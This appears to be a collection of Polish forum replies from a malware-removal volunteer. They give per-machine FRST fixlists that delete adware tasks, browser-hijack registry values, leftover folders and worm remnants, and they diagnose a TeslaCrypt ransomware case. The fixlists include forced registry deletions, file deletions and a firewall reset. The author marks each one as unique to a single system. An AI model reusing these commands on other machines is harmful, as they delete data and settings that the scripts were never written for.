C:\WINDOWS\Tasks\At*.job EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Wyłącz COMODO, gdyż zablokuje FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw ten plik. Nowe skany FRST nie są mi potrzebne.

Na koniec: 1. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. 2. Sugerowane dodatkowe zabezpieczenia specjalizowane pod kątem infekcji szyfrujących dane: KLIK.

Powód czyszczenia folderów Przywracania systemu jest przecież wyjaśniony w opisie tej operacji. Po czyszczeniu system w pewnym momencie samodzielnie utworzy kolejny punkt Przywracania, ale oczywiście możesz wyprzedzić fakty i zrobić zaraz po czyszczeniu ręcznie punkt. On i tak nie utrzyma się za długo, bo magazyn na punkty jest ograniczony i system okresowo samoistnie oczyszcza punkty, by się zmieściły nowe.

To nie są "antywirusy" i nie zastąpią takowych, tylko inne typy programów starające się zapobiec infekcji szyfrującej dane. DelFix wykonał zadanie. Możesz usunąć z dysku plik C:\delfix.txt.

FRST i jego logi skasował przecież DelFix. Jeśli jednak gdzieś widzisz jakąś inną kopię FRST, to usuń z dysku.

Akcje do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 WdsManPro; C:\ProgramData\5WMiniPro5\WMiniPro.exe [351904 2015-12-04] (DTools LIMITED) Task: {5F32CCF5-F147-4F6C-8E6A-E911525EE85C} - System32\Tasks\ExcuserDisusesV2 => Rundll32.exe InsobrietyFlinches.dll,main 7 1 Task: {6089CEDB-9925-4F4D-B4B0-F13CBDB017D0} - System32\Tasks\{8F98D902-566B-4904-9712-990E47188B4F} => Firefox.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=4.1.0.179.259&LastError=404 Task: {E3E9D8C1-CD28-4F47-A265-827D405BA0A1} - System32\Tasks\Price Fountain => C:\Users\Marcin\AppData\Roaming\PriceFountain\UpdateProc\UpdateTask.exe [2015-12-04] () Task: {EBE57FCD-8F1E-41BD-B38F-D7A9EDF1D658} - System32\Tasks\{011893BF-33AF-408E-AF5C-25A7E2769BBE} => pcalua.exe -a C:\Users\Marcin\Desktop\pbsetup.exe -d C:\Users\Marcin\Desktop Task: C:\Windows\Tasks\Price Fountain.job => C:\Users\Marcin\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE FF Plugin: @esn/npbattlelog,version=2.5.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.0\npbattlelogx64.dll [brak pliku] FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [brak pliku] FF Plugin-x32: @esn/npbattlelog,version=2.5.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.0\npbattlelog.dll [brak pliku] FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [brak pliku] FF HKLM-x32\...\Firefox\Extensions: [faststartff@gmail.com] - C:\Users\Marcin\AppData\Roaming\Mozilla\Firefox\Profiles\kf1mkolh.default-1398804511687\extensions\faststartff@gmail.com => nie znaleziono FF HKLM-x32\...\Firefox\Extensions: [deskCutv2@gmail.com] - C:\Users\Marcin\AppData\Roaming\Mozilla\Firefox\Profiles\kf1mkolh.default-1398804511687\extensions\deskCutv2@gmail.com => nie znaleziono FF HKLM-x32\...\Firefox\Extensions: [yahooprotected@gmail.com] - C:\Users\Marcin\AppData\Roaming\Mozilla\Firefox\Profiles\kf1mkolh.default-1398804511687\extensions\yahooprotected@gmail.com => nie znaleziono StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe hxxp://www.yoursearching.com/?type=sc&ts=1449254019&z=94edb10eff2b0026da657fcg7zaz4t0oew3zfedg9e&from=cornl&uid=SAMSUNGXSSDX830XSeries_S0Z3NSAC912970 HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=MSSE HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=MSSE HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mystartsearch.com/web/?type=ds&ts=1419361882&from=epom2&uid=SAMSUNGXSSDX830XSeries_S0Z3NSAC912970&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mystartsearch.com/web/?type=ds&ts=1419361882&from=epom2&uid=SAMSUNGXSSDX830XSeries_S0Z3NSAC912970&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mystartsearch.com/?type=hp&ts=1419361882&from=epom2&uid=SAMSUNGXSSDX830XSeries_S0Z3NSAC912970 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mystartsearch.com/?type=hp&ts=1419361882&from=epom2&uid=SAMSUNGXSSDX830XSeries_S0Z3NSAC912970 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1419361882&from=epom2&uid=SAMSUNGXSSDX830XSeries_S0Z3NSAC912970&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1419361882&from=epom2&uid=SAMSUNGXSSDX830XSeries_S0Z3NSAC912970&q={searchTerms} HKU\S-1-5-21-1718635078-569779591-784435394-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mystartsearch.com/?type=hp&ts=1419361882&from=epom2&uid=SAMSUNGXSSDX830XSeries_S0Z3NSAC912970 SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKU\S-1-5-21-1718635078-569779591-784435394-1001 -> DefaultScope {3C5C480F-1E4D-45AD-9EF0-A849779370D2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKU\S-1-5-21-1718635078-569779591-784435394-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1419361882&from=epom2&uid=SAMSUNGXSSDX830XSeries_S0Z3NSAC912970&q={searchTerms} SearchScopes: HKU\S-1-5-21-1718635078-569779591-784435394-1001 -> {3C5C480F-1E4D-45AD-9EF0-A849779370D2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE BHO: Skype add-on for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> D:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll => Brak pliku BHO-x32: IETabPage Class -> {3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} -> C:\Program Files (x86)\SupTab\SupTab.dll => Brak pliku StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.mystartsearch.com/?type=sc&ts=1419361882&from=epom2&uid=SAMSUNGXSSDX830XSeries_S0Z3NSAC912970 CustomCLSID: HKU\S-1-5-21-1718635078-569779591-784435394-1001_Classes\CLSID\{6D7AE628-FF41-4CD3-91DD-34825BB1A251}\localserver32 -> C:\Program Files\Autodesk\AutoCAD MEP 2012\acad.exe /Automation => Brak pliku CustomCLSID: HKU\S-1-5-21-1718635078-569779591-784435394-1001_Classes\CLSID\{B77E471C-FBF3-4CB5-880F-D7528AD4B349}\localserver32 -> C:\Program Files\Autodesk\AutoCAD MEP 2012\acad.exe /Automation => Brak pliku CustomCLSID: HKU\S-1-5-21-1718635078-569779591-784435394-1001_Classes\CLSID\{C92FB640-AD4D-498A-9979-A51A2540C977}\localserver32 -> C:\Program Files\Autodesk\AutoCAD MEP 2012\acad.exe /Automation => Brak pliku CustomCLSID: HKU\S-1-5-21-1718635078-569779591-784435394-1001_Classes\CLSID\{D70E31AD-2614-49F2-B0FC-ACA781D81F3E}\localserver32 -> C:\Program Files\Autodesk\AutoCAD MEP 2012\acad.exe => Brak pliku CustomCLSID: HKU\S-1-5-21-1718635078-569779591-784435394-1001_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD MEP 2012\acadficn.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1718635078-569779591-784435394-1001_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Marcin\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku C:\Program Files (x86)\mozilla firefox\browser\searchplugins C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat C:\ProgramData\5WMiniPro5 C:\ProgramData\WarThunder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\pit-CAD 2012 - Deutsch C:\Users\Marcin\AppData\Local\ExcuserDisuses C:\Users\Marcin\AppData\Local\GG C:\Users\Marcin\AppData\Local\WarThunder C:\Users\Marcin\AppData\Roaming\PriceFountain C:\Users\Marcin\AppData\Roaming\yoursearching C:\Windows\System32\Tasks\SidebarExecute Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale bez Shortcut. Dołącz też plik fixlog.txt.

Pliki o rozszerzeniu *.vvv to najnowszy wariant TeslaCrypt: KLIK. Bardzo mi przykro, ale nie ma technicznej możliwości odszyfrowania danych. Jedyna (niepolecana) możliwość to uiszczenie opłaty przestępcom. Jedyne co jest w mojej gestii, to doczyszczenie odpadków infekcji, czyli dodanych wtórnie plików how_recover+*. Decyduj czy się za to zabieramy, czy reinstalujesz system.

Pendrive został zainfekowany robakiem Gamarue: KLIK. Natomiast sam system też nie jest czysty, są różne odpadki adware. Akcje do przeprowadzenia: 1. Odinstaluj zbędnik i starą wersję: HP Deskjet 1050 J410 series — badanie mające na celu poprawę produktów, Java 8 Update 4. 2. Zakładam że pendrive jest nadal widoczny pod literą F. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR StartupUrls: Default -> "","hxxp://www.sweet-page.com/?type=hppp&ts=1396342427&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z","hxxp://www.sweet-page.com/?type=hppp&ts=1396343895&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z","hxxp://www.sweet-page.com/?type=hppp&ts=1396362261&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z","hxxp://www.sweet-page.com/?type=hppp&ts=1396370667&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z","hxxp://www.sweet-page.com/?type=hppp&ts=1396374311&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z","hxxp://do-search.com/?type=hp&ts=1431545918&z=1fb82a1a7206ef7863cecfbg2zccdg5w2z6w9t8gez&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z","hxxp://do-search.com/?type=hppp&ts=1431545951&z=0fe3d8f6863588fa152ca84gezccagdw0z9w7t4zam&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z" CHR DefaultSearchURL: Default -> hxxp://do-search.com/web/?type=dspp&ts=1431545951&z=0fe3d8f6863588fa152ca84gezccagdw0z9w7t4zam&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://do-search.com/?type=hppp&ts=1431545951&z=0fe3d8f6863588fa152ca84gezccagdw0z9w7t4zam&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://do-search.com/?type=hppp&ts=1431545951&z=0fe3d8f6863588fa152ca84gezccagdw0z9w7t4zam&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://do-search.com/web/?type=ds&ts=1431545918&z=1fb82a1a7206ef7863cecfbg2zccdg5w2z6w9t8gez&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://do-search.com/web/?type=ds&ts=1431545918&z=1fb82a1a7206ef7863cecfbg2zccdg5w2z6w9t8gez&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://do-search.com/?type=hppp&ts=1431545951&z=0fe3d8f6863588fa152ca84gezccagdw0z9w7t4zam&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://do-search.com/?type=hppp&ts=1431545951&z=0fe3d8f6863588fa152ca84gezccagdw0z9w7t4zam&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://do-search.com/web/?type=ds&ts=1431545918&z=1fb82a1a7206ef7863cecfbg2zccdg5w2z6w9t8gez&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://do-search.com/web/?type=ds&ts=1431545918&z=1fb82a1a7206ef7863cecfbg2zccdg5w2z6w9t8gez&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z&q={searchTerms} HKU\S-1-5-21-1463829551-4197206163-683052512-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://do-search.com/web/?type=dspp&ts=1431545951&z=0fe3d8f6863588fa152ca84gezccagdw0z9w7t4zam&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z&q={searchTerms} HKU\S-1-5-21-1463829551-4197206163-683052512-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.gazeta.pl/0,0.html?p=170 HKU\S-1-5-21-1463829551-4197206163-683052512-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://do-search.com/?type=hppp&ts=1431545951&z=0fe3d8f6863588fa152ca84gezccagdw0z9w7t4zam&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z HKU\S-1-5-21-1463829551-4197206163-683052512-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://do-search.com/web/?type=dspp&ts=1431545951&z=0fe3d8f6863588fa152ca84gezccagdw0z9w7t4zam&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z&q={searchTerms} SearchScopes: HKU\S-1-5-21-1463829551-4197206163-683052512-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://do-search.com/web/?type=dspp&ts=1431545951&z=0fe3d8f6863588fa152ca84gezccagdw0z9w7t4zam&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z&q={searchTerms} SearchScopes: HKU\S-1-5-21-1463829551-4197206163-683052512-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://do-search.com/web/?type=dspp&ts=1431545951&z=0fe3d8f6863588fa152ca84gezccagdw0z9w7t4zam&from=cor&uid=ST3750525AS_6VPJ666ZXXXX6VPJ666Z&q={searchTerms} BHO-x32: Crazy Score -> {f439aa7e-a2a0-4635-99a2-164180e848ca} -> C:\Program Files (x86)\Crazy Score\Extensions\f439aa7e-a2a0-4635-99a2-164180e848ca.dll => Brak pliku FF HKLM-x32\...\Firefox\Extensions: [sweetsearch@gmail.com] - C:\Users\Pawel\AppData\Roaming\Mozilla\Firefox\Profiles\yidiuu52.default\extensions\sweetsearch@gmail.com => nie znaleziono HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-1463829551-4197206163-683052512-1000\...\Run: [ALLUpdate] => "C:\Program Files (x86)\ALLPlayer\ALLUpdate.exe" "sleep" HKU\S-1-5-21-1463829551-4197206163-683052512-1000\...\Run: [ALLPlayer WiFi Remote] => C:\Program Files (x86)\ALLPlayer Remote\ALLPlayerRemoteControl.exe HKU\S-1-5-21-1463829551-4197206163-683052512-1000\...\Run: [Codec Pack Update Checker] => "C:\Windows\system32\Codecs\UpdateChecker.exe" ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku CustomCLSID: HKU\S-1-5-21-1463829551-4197206163-683052512-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Pawel\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku Task: {0FBBDC61-3529-4F54-B5EB-8BC8E9358DF1} - System32\Tasks\{04937F48-895F-4584-998D-A7A7A5E3B639} => pcalua.exe -a F:\mb_driver_lan_realtek_rtltool.exe -d F:\ Task: {1C05F6AB-D8C0-4951-B71D-96FEB6B9CD97} - System32\Tasks\{0BB60A0B-B418-4403-AE88-772C8885845B} => pcalua.exe -a E:\Network\RTL8111\NonVista\setup.exe -d E:\Network\RTL8111\NonVista Task: {275AEAA3-26F6-428C-8246-647C3BC3EFC3} - System32\Tasks\{B3EB59F7-6050-49B7-955C-175D9AB7D2FD} => pcalua.exe -a C:\Users\Pawel\AppData\Roaming\do-search\UninstallManager.exe -c -ptid=cor Task: {2B65C6CD-7671-4517-8AE9-77F7D6E5A693} - System32\Tasks\{A5DD03EA-4C07-4841-BC12-D136EC808D71} => pcalua.exe -a E:\SETUP.EXE -d E:\ Task: {5B83997E-B01F-4AC8-95BA-A2348517B701} - System32\Tasks\{588DC8FE-A2DE-4698-8792-68F9938E3157} => pcalua.exe -a E:\NVsetup.exe -d E:\ Task: {5F673D7E-8ED7-40F7-9E00-7B5A290C8110} - System32\Tasks\{61F500CF-7AA1-4EF1-979C-434C3B17D5A9} => pcalua.exe -a E:\Network\RTL8111\Vista\Setup.exe -d E:\Network\RTL8111\Vista Task: {6FDDC361-C36A-4731-BE40-3D0F8E9B2BA7} - System32\Tasks\{DD645CAE-7A86-497A-89AD-1FED8B67830B} => pcalua.exe -a C:\LIVE!C~1\VISTA_~1\CtDrvStp.exe -d C:\LIVE!C~1\VISTA_~1 -c -wait Task: {91A29AC9-41E4-4A9C-AC1A-0EE80EEA2F8E} - System32\Tasks\{8A4B47EF-54AB-4E34-A710-20C694664934} => pcalua.exe -a E:\Audio\Realtek\HD_Audio\Setup.exe -d E:\Audio\Realtek\HD_Audio Task: {DBFF4EF7-9B19-4366-8B19-A4297C347B15} - System32\Tasks\{8FE7F61E-FEBC-4498-9F77-C2EAA2D845BB} => pcalua.exe -a E:\Network\RTL8111\Vista\setup1.exe -d E:\Network\RTL8111\Vista S3 GMSIPCI; \??\E:\INSTALL\GMSIPCI.SYS [X] S3 Origin Client Service; "C:\Users\Pawel\Desktop\OriginClientService.exe" [X] S1 wafd_1_10_0_19; system32\drivers\wafd_1_10_0_19.sys [X] C:\Windows\SysWOW64\rundll32.rar F:\TOSHIBA (8GB).lnk RemoveDirectory: F:\System Volume Information CMD: attrib /d /s -s -h F:\* Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\GG" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Jeśli komenda odkrywania danych na pendrive się wykonana poprawnie, na urządzeniu ujawni się folder "bez nazwy", do którego infekcja przesunęła wqszystkie dane. Wejdź do niego i przenieś dane poziom wyżej, a folder "bez nazwy" przez SHIFT+DEL skasuj. 4. Zrób nowe logi: FRST z opcji Skanuj (Scan), bez Addition i Shortcut, oraz USBFix z opcji Listing przy podpiętym pendrive. Dołącz też plik fixlog.txt.

DelFix wykonał zadanie. Skasuj z dysku plik C:\delfix.txt. Spybot to przestarzały program. Zaś antywirusy nie są za bardzo specjalizowane w zatrzymywaniu tego typu instalacji. Większą orientację na instalacje adware/PUP ma komercyjna wersja Malwarebytes Anti-Malware z rezydentem. Jest też darmowy program Unchecky służący automatycznemu omijania min w instalatorach, ale program nie pomoże jeśli dany downloader w ogóle nie ma opcji wykluczenia sponsora, nie zastąpi też myślenia.

Z raportów nic nie wynika, ale upewnij się, że problemu nie tworzy Netbalancer operujący na sterowniku. Tymczasowo go odinstaluj, by sprawdzić czy jest różnica. R1 nbdrv; C:\Windows\system32\DRIVERS\nbdrv.sys [42128 2015-02-05] (SeriousBit) Trudno tu cokolwiek powiedzieć bez detali błędu. Jedyne co widzę w raporcie FRST, to że obecnie zainstalowane oprogramowanie HP jest strasznie stare (datowanie na 2010/2011): S2 Net Driver HPZ12; C:\Windows\System32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [brak podpisu cyfrowego] S2 Pml Driver HPZ12; C:\Windows\System32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [brak podpisu cyfrowego] Spróbuj odinstalować wszystkie programy HP oraz usunąć też urządzenie, następnie restart systemu > podłączenie urządzenia (nie instaluj żadnych programów HP z zewnętrznych instalatorów) > próba instalacji aktualizacji z Windows Update. ==================== Zainstalowane programy ====================== Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.) gpedt.msc 1.0 (HKLM-x32\...\{10B9C608-BF7C-4CCF-A658-C01D969DCA21}_is1) (Version: - Richard) HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP) HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP) HP Photosmart Officejet and Deskjet All-In-One Driver Software (HKLM\...\{6F5B70F0-EA6C-4A5B-BB16-8390BD66B251}) (Version: 14.0 - HP) HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP) HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.1.40.3 - Hewlett-Packard Company) HP Support Solutions Framework (HKLM-x32\...\{B11B6E26-63A4-4BB6-AA39-0AF758B26092}) (Version: 12.0.30.219 - Hewlett-Packard Company) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) Przy okazji, pozbąć się starszej wersji Adobe Shockwave Player oraz potworka gpedt.msc 1.0. Ten ostatni bezużyteczny, wstawia tylko pozorowane gpedit, które w ogóle nie działa poprawnie. Jest awykonalnym mieć sprawne gpedit na edycji Home. Przykładowy temat z forum: KLIK. Czy na pewno w Ustawienia > System > Informacje widzisz "Wersja 1511"? FRST w ogóle nie wykrywa tej aktualizacji i klasyfikuje Twój system jako goły Windows 10 RTM: Platform: Windows 10 Home (X64) Język: Polski (Polska) Internet Explorer Wersja 11 (Domyślna przeglądarka: Chrome) Tak, ja wiem że teraz była aktualizacja z Windows 10 do Windows 10 1511, ale to system wielokrotnie aktualizowany. Log FRST wskazuje, że wcześniej był Windows 7 (lub Windows 8.1) aktualizowany do Windows 10, bo są charakterystyczne szczątkowe zadania "GWX" należące do notyfikatora rezerwującego pobieranie Windows 10 na starszych systemach. Usuwanie szczątków. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {0E974848-BB0C-4790-B756-DD6B84E6E7A6} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku Task: {1968E74C-5F0B-401D-94F3-C77DC372F3CE} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {1BD0B56F-9778-410A-8309-86BA6B3A22AF} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku Task: {25A36406-D6AC-44D8-B8B8-163ADB0D9A49} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku Task: {2F3F31BB-C9B7-4B21-8F17-074D6D0DC611} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku Task: {A1AD436C-6FA0-44B7-A640-058332A93152} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku Task: {A74FC3D1-CCB0-413E-9859-5ECB581CCCB9} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {AB012EA6-96F3-40A9-8055-723812633DF6} - System32\Tasks\{B9E71C2D-5CB1-433C-9B43-5B4C15A36A5E} => Chrome.exe hxxp://ui.skype.com/ui/0/7.14.0.105/pl/abandoninstall?source=lightinstaller&page=tsBing Task: {DA7BDAAF-3BCE-487A-9AC1-F48CB47F645D} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku Task: {E76F4F5F-9938-49D1-879F-86E2326044A5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {E840F231-922E-4CCF-A666-47384BE3610E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku Task: {F068590E-1D24-4038-ADD0-E9F699777248} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe HKLM-x32\...\Run: [] => [X] RemoveDirectory: C:\Program Files (x86)\Temp RemoveDirectory: C:\Users\Sławomir\Doctor Web C:\WINDOWS\system32\*.tmp Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. Nowe logi FRST nie są już mi potrzebne.

Zadania zostały wykonane. Jeszcze poprawka na odpadkowe elementy po odinstalowaniu RealPlayer. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\Real RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\RealNetworks RemoveDirectory: C:\Documents and Settings\slawek\Dane aplikacji\Real RemoveDirectory: C:\Documents and Settings\slawek\Dane aplikacji\RealNetworks RemoveDirectory: C:\Program Files\Real RemoveDirectory: D:\Documents and Settings\slawek\Pulpit\Stare dane programu Firefox CMD: del /q C:\WINDOWS\Tasks\Real*.job Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. Nowe logi FRST nie są mi potrzebne.

Skonsultowałam sprawę widoczności tych pozycji z autorem, teraz te wpisy są po prostu ukryte. Te sterowniki i tak były wyłączone (system ich nie ładuje), więc nie musisz rozważać co z nimi dalej zrobić. Kończymy temat. Zastosuj DelFix, następnie wyczyść foldery Przywracania systemu: KLIK. I zainteresuj się aktualizacją systemu do Windows 8.1 > Windows 10.

